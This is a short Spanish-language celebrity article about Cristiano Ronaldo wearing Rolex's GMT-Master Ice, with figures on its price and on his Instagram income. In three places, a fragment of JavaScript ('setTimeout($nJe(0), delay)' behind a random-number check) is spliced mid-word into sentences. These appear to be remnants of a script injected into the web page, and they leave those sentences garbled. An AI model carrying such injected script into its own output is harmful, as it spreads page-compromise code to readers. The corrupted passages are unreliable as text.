Cristiano Ronaldo usa el reloj más caro del mundo

    Cristiano Ronaldo usa el Rolex más caro que ha existido

    El ícono del fútbol usa el GMT-Master Ice.

    Autor: Steve Huff de Maxim US 3 enero, 2020


     

     

     

    ¿Qué reloj usa Cristiano Ronaldo?

     

     

    Cristiano Ronaldo gana mucho dinero. Eso no hace falta decirlo. La superestrella del fútbol gana una cantidad increíble solo en su Instagram, donde tiene casi 200 millones de seguidores, y Forbes informa que fue el segundo atleta mejor pagado de la década, solo por detrás de Floyd Mayweather. Por lo tanto, no fue una sorpresa cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Ronaldo apareció recientemente en una conferencia deportiva en Dubai con el reloj más caro que Rolex haya fabricado, el GMT-Master Ice.

     

     

     

     

    Según Paul Altieri, la autoridad de Rolex detrás de Bob’s Watches, un Rolex GMT-Master Ice costó $485,350 dólares cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando se introdujo por primera vez en el mercado en 2018.

     

    Lo curioso es que Ronaldo probablemente ni siquiera tuvo que invertir su dinero en el fútbol para comprarlo: en realidad, aprovecha aún más sus redes sociales que cualquiera de los Kardashians o Jenners, según Buzz Bingo, superandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando los $40 millones de dólares por año.

     

    En otras palabras, podría comprar un segundo Rolex GMT-Master Ice después de vender solo dos posts de Instagram.

     

    Ahora checa precisamente la lista de LOS 10 ATLETAS MEJOR PAGADOS DE LA DÉCADA.

     

     

     

    Temas relacionados con esta nota: ,

El ícono del fútbol usa el GMT-Master Ice.